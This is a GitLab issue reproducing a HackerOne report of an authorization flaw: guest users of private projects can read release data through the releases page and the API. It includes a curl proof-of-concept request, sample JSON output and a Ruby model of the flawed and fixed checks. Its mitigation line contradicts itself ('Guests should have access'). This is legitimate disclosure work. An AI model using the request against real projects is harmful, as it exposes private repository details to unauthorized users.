GitLab.org / GitLab FOSS / Issues / #56402

Guest users of private projects have access to releases

HackerOne report #478082 by xanbanx on 2019-01-11, assigned to asaba:

GitLab recently introduced Releases, a way to present tags in the user interface of GitLab. These releases are currently managed via the API. Releases are closely tied to ordinary git tags, and therefore also present similar information. However, guest users, who do not have access to the code, also have access to these releases and therefore also have access to this information related to the code.

Steps to reproduce

Tested on GitLab 11.7.0-rc4-ee

  1. Create a private project, push some code, create a git tag, and a new release via the API. (In these steps the project is accessible via the namespace joe/test-releases)
  2. Add a guest user to the project
  3. As the guest user open the following page: https://gitlab.com/joe/test-releases/releases

Here, you can observe that the sidebar is not showing the releases page. However, you can access this page and retrieve the list of releases.

Similarly, as a guest user you can also retrieve the release via the API. Therefore, perform the following API call:

curl --request GET --header "PRIVATE-TOKEN: <GUEST-USER-TOKEN>" https://example.gitlab.com/api/v4/<project-id>/releases

This will return all releases including information like the tag, description, committing details, etc., as shown below in the JSON output.

[
    {
        "tag_name": "secret-tag",
        "description": "This is a secret security release mitigating vulnerabilities",
        "name": "Secret Release",
        "description_html": "<p dir=\"auto\">This is a secret security release mitigating vulnerabilities</p>",
        "created_at": "2019-01-11T12:30:06.503Z",
        "author": {
            "id": 1,
            "name": "joe",
            "username": "joe",
            "state": "active",
            "avatar_url": "https://secure.gravatar.com/avatar/6466f73ed21b9d1624dee906821e9176?s=80&d=identicon",
            "web_url": "https://example.gitlab.com/joe"
        },
        "commit": {
            "id": "9acaed88330c5fcb7cd119e7b10af49d3a9a48ab",
            "short_id": "9acaed88",
            "title": "Add new file",
            "created_at": "2019-01-11T12:25:04.000Z",
            "parent_ids": [],
            "message": "Add new file",
            "author_name": "joe",
            "author_email": "test@bar.com",
            "authored_date": "2019-01-11T12:25:04.000Z",
            "committer_name": "joe",
            "committer_email": "test@bar.com",
            "committed_date": "2019-01-11T12:25:04.000Z"
        },
        "assets": {
            "count": 4,
            "sources": [
                {
                    "format": "zip",
                    "url": "https://example.gitlab.com/joe/test-releases/-/archive/secret-tag/test-releases-secret-tag.zip"
                },
                {
                    "format": "tar.gz",
                    "url": "https://example.gitlab.com/joe/test-releases/-/archive/secret-tag/test-releases-secret-tag.tar.gz"
                },
                {
                    "format": "tar.bz2",
                    "url": "https://example.gitlab.com/joe/test-releases/-/archive/secret-tag/test-releases-secret-tag.tar.bz2"
                },
                {
                    "format": "tar",
                    "url": "https://example.gitlab.com/joe/test-releases/-/archive/secret-tag/test-releases-secret-tag.tar"
                }
            ],
            "links": []
        }
    }
]

Similarly, the endpoint https://example.gitlab.com/api/v4/<project-id>/releases/:tag_name is also vulnerable to this.

Steps to mitigate

Perform proper authorization in the API and for the release page. Guests should have access to this information.

Impact

Guest users have access to private information like release details, etc...
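The authorization gap the report describes, modelled as an added illustration in Ruby (this is not the reporter's code nor GitLab's own policy code; the ability names `read_project` and `download_code` and the numeric role ladder are assumptions of the model):

```ruby
# Added illustration, not GitLab's own code: a simplified model of why a
# release endpoint must require more than "can see the project".
GUEST     = 10
REPORTER  = 20
DEVELOPER = 30

# Minimum access level per ability in this model. Guests of a private
# project can see the project, but reading code needs reporter or above.
MIN_LEVEL_FOR = {
  read_project:  GUEST,
  download_code: REPORTER,
}.freeze

def can?(level, ability)
  level >= MIN_LEVEL_FOR.fetch(ability)
end

# Constructed sample release, shaped like the JSON output in the report:
# it carries the tag name, commit metadata and source archive links.
SAMPLE_RELEASES = [{
  "tag_name" => "secret-tag",
  "name"     => "Secret Release",
  "commit"   => { "id" => "9acaed88330c5fcb7cd119e7b10af49d3a9a48ab" },
  "assets"   => { "sources" => [{ "format" => "zip", "url" => "<archive-url>" }] },
}].freeze

# Behaviour as reported: only project visibility is checked, so a guest
# receives the tag, the commit details and the archive links.
def vulnerable_releases_response(level, releases = SAMPLE_RELEASES)
  return [403, nil] unless can?(level, :read_project)
  [200, releases]
end

# Hardened behaviour: a release exposes tag, commit and source archives, so
# listing releases is gated on the same ability as downloading the code.
def hardened_releases_response(level, releases = SAMPLE_RELEASES)
  return [403, nil] unless can?(level, :read_project) && can?(level, :download_code)
  [200, releases]
end

if __FILE__ == $PROGRAM_NAME
  { guest: GUEST, reporter: REPORTER, developer: DEVELOPER }.each do |role, level|
    puts "#{role}: vulnerable=#{vulnerable_releases_response(level).first} " \
         "hardened=#{hardened_releases_response(level).first}"
  end
end
```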

Attachments

Warning: Attachments received through HackerOne, please exercise caution!

  • Screenshot_20190111_133345.png